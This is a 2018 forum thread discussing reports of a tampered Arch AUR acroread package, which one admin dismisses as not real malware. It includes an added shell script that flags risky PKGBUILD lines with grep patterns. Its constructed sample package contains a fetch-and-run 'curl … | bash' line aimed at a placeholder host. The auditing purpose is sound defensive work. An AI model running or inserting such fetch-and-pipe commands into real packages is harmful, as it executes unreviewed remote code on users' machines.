Arch AUR Repo Malware Attack "Hacked"?


6 replies to this topic

#1 OFFLINE   mhbell

mhbell

    Posting Prodigy

  • Members
  • 2,208 posts

Posted 11 July 2018 - 03:35 PM

Got this in my email.

Arch Linux PDF reader package poisoned


Malware Attack On Arch Linux AUR Repository; Three Packages Infected So Far - Amateur bid to add code to Arch Linux packages found and squashed - Full Coverage
Registered Linux User #239772
Mint 18.1 Cinnamon, MX-16, Siduction LXQT, Debian Stretch, and Other Linux Distros
https://pctechman.wordpress.com/

#2 OFFLINE   securitybreach

securitybreach

    CLI Phreak

  • Forum Admins
  • 23,645 posts

Posted 11 July 2018 - 04:21 PM

It's all complete lies. There was not any malware at all; technically it wasn't even malicious. He simply added a systemd timer and script (called xeactor) to gather basic system info. https://ptpb.pw/~x. I wouldn't really call it malware but it's a perfect example of why you should read the PKGBUILDs if you install user-submitted packages. If someone is stupid enough to blindly install an unofficial app, then they deserve to be infected. Too bad that it wasn't actually malicious.

It was an orphaned pkg (acroread - who even uses it?) and some pleb adopted it, added a timer and script to gather basic system info, which didn't even work... and then left you a 'compromised.txt' in your home to brag... User was known to devs, known moron who wanted help installing kali.
CNI Radio/G+ Profile/Configs/PGP Key/comhack π

"Do you begin to see, then, what kind of world we are creating? It is the exact opposite of the stupid hedonistic Utopias that the old reformers imagined. A world of fear and treachery and torment, a world of trampling and being trampled upon, a world which will grow not less but more merciless as it refines itself. Progress in our world will be progress toward more pain." -George Orwell, 1984
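
The PKGBUILD read-through recommended in post #2 can be given a first pass by a script. The following is an added example, not part of the thread and not an Arch Linux tool: the sample PKGBUILD, its `example.invalid` URL and the three heuristic patterns are constructed for illustration, and a hit only marks a line for manual reading.

```shell
#!/bin/sh
# Added example: point a reviewer at PKGBUILD / .install lines that need a
# careful manual read before running makepkg. Heuristic patterns, chosen here.

# flag FILE CATEGORY ERE -> prints "LINE:CATEGORY:TEXT" for each matching line
flag() {
    grep -nE -- "$3" "$1" | sed "s/^\([0-9][0-9]*\):/\1:$2:/"
}

# audit_pkgbuild FILE -> all findings, ordered by line number
audit_pkgbuild() {
    {
        # A download piped straight into an interpreter runs unreviewed code.
        flag "$1" pipe-to-shell \
            '(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+)?(ba|da|z)?sh'
        # Units and timers give a package a way to keep running after install.
        flag "$1" systemd-unit \
            '\.(timer|service)|systemd/(system|user)|systemctl[[:space:]]'
        # Packages install under $pkgdir; touching a user's home is unusual.
        flag "$1" home-write '(\$HOME|~/|/home/)'
    } | sort -t: -k1,1n
}

# make_sample -> writes a constructed PKGBUILD to a temp file, prints its path
make_sample() {
    f=$(mktemp) || return 1
    cat > "$f" <<'EOF'
pkgname=example-reader
pkgver=1.0
source=("https://example.invalid/example-reader-1.0.tar.gz")
package() {
  install -Dm755 reader "$pkgdir/usr/bin/reader"
  curl -s https://example.invalid/x | bash
  install -Dm644 collect.timer "$pkgdir/usr/lib/systemd/system/collect.timer"
  touch "$HOME/note.txt"
}
EOF
    printf '%s\n' "$f"
}

sample=$(make_sample) && audit_pkgbuild "$sample"
rm -f "$sample"
```

An empty result is not a clean bill of health; the script narrows where to look first, and the full PKGBUILD and any `.install` file still need reading.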

#3 OFFLINE   mhbell

mhbell

    Posting Prodigy

  • Members
  • 2,208 posts

Posted 11 July 2018 - 04:30 PM

I figured if anyone would know, it would be you Security. LoL! There are about 5 different newsletters carrying the story, and they all say the same.

#4 OFFLINE   securitybreach

securitybreach

    CLI Phreak

  • Forum Admins
  • 23,645 posts

Posted 11 July 2018 - 04:45 PM

mhbell, on 11 July 2018 - 04:30 PM, said:

I figured if anyone would know, it would be you Security. LoL! There are about 5 different newsletters carrying the story, and they all say the same.

Honestly, I'm already tired of hearing about it. All these sites using buzzwords to get hits. There was not a single reason to call it malware.

#5 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,588 posts

Posted 11 July 2018 - 09:49 PM

securitybreach, on 11 July 2018 - 04:45 PM, said:

Honestly, I'm already tired of hearing about it. All these sites using buzzwords to get hits. There was not a single reason to call it malware.

Maybe the "hacker's" name was Mal? :shifty:
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
For the things we have to learn before we can do them, we learn by doing them.

#6 OFFLINE   securitybreach

securitybreach

    CLI Phreak

  • Forum Admins
  • 23,645 posts

Posted 11 July 2018 - 09:59 PM

sunrat, on 11 July 2018 - 09:49 PM, said:

securitybreach, on 11 July 2018 - 04:45 PM, said:

Honestly, I'm already tired of hearing about it. All these sites using buzzwords to get hits. There was not a single reason to call it malware.

Maybe the "hacker's" name was Mal? :shifty:

Haha :hysterical:

#7 OFFLINE   mhbell

mhbell

    Posting Prodigy

  • Members
  • 2,208 posts

Posted 12 July 2018 - 01:01 PM

sunrat, on 11 July 2018 - 09:49 PM, said:

securitybreach, on 11 July 2018 - 04:45 PM, said:

Honestly, I'm already tired of hearing about it. All these sites using buzzwords to get hits. There was not a single reason to call it malware.

Maybe the "hacker's" name was Mal? :shifty:

Last Name "Ware" :whistling:



